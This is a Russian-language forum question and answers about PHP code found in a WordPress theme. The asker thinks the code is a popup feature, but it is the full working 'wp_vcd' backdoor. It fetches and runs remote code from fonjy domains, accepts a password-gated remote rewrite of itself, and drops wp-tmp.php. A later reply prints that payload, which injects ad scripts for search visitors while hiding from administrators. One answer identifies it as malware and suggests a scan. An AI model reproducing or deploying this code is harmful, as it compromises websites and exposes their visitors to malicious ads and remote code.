За что может отвечать этот код?

Вообщем сабж, понятно что этот код отвечает за вывод popup окон при нажатии на области сайта, вопрос другой как он это делает?
Этот код идет в стандартном наборе с нулёной темой Wordpress.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '58d2df047ca5aefc4a688a14a0a49a67'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='e810cc8873fd72ff6d1585ebccddae8e';
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>
  • Вопрос задан
  • 967 просмотров
Пригласить эксперта
Ответы на вопрос 2
azerphoenix
@azerphoenix
Java Software Engineer
Установите плагин Wordfence и просканируйте сайт. Возможно, что вы установили "левый" плагин, который содержал вредоносный код.
Файл wp-tmp.php не является файлом ядра ВП. И скорее всего необходимо удалить его.
Подробная информация - ссылка

As mentioned by ..., this is not a standard WordPress core file and the code contains external links (already suspicious) which, moreover are blacklisted.
Please make sure to follow our site cleaning guide in order to restore your site’s integrity.
Ответ написан
Комментировать
maksky
@maksky Автор вопроса
wp-tmp.php

ini_set('display_errors', 0);
error_reporting(0);
$anx='e810cc8873fd72ff6d1585ebccddae8e';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 
}
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы